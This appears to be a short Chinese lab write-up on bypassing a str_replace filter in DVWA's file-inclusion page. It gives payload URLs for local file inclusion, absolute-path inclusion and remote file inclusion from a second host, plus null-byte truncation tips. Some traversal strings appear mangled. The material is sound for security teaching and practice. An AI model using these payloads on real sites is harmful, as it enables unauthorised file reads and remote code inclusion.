str_replace函数绕过
实验环境DVWA,安全性medium
有时程序员会使用str_replace函数进行防御,这个函数是极其不安全的,因为可以使用双写绕过替换规则轻松绕过
绕过方法
例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103/phpinfo.txt,成功执行远程命令。
同时,因为替换的只是“…/”、“…\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。
三个实例
1、本地文件包含
http://192.168.0.103/dvwa/vulnerabilities/fi/page=…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./xampp/htdocs/dvwa/php.ini
2、绝对路径不受任何影响
http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini
3、远程文件包含
http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt
包含截断绕过
防御代码
<?php
if(isset($_GET['page'])){
include $_GET['page'] .".php" ;
}else{
include 'home.php';
}
?>
判断参数是否赋值,假如赋值了,包含参数变量, 加.’’.php’'用来防御,如果没有复制,包含home.php
这种方法只适合于magic_quotes_gpc=off的时候,
php版本小于5.3.4,可通过%00截断绕过,不过现在已经很难见到了,比如:
index.php?file=info.txt//////////////…………超过一定数据的/。
个人想法
有时候对防御手段的绕过不仅仅是想如何不被拦截,而是要想着去利用可能的防御手段,将他人的手段占为己用,这样就可以轻松绕过一些防御了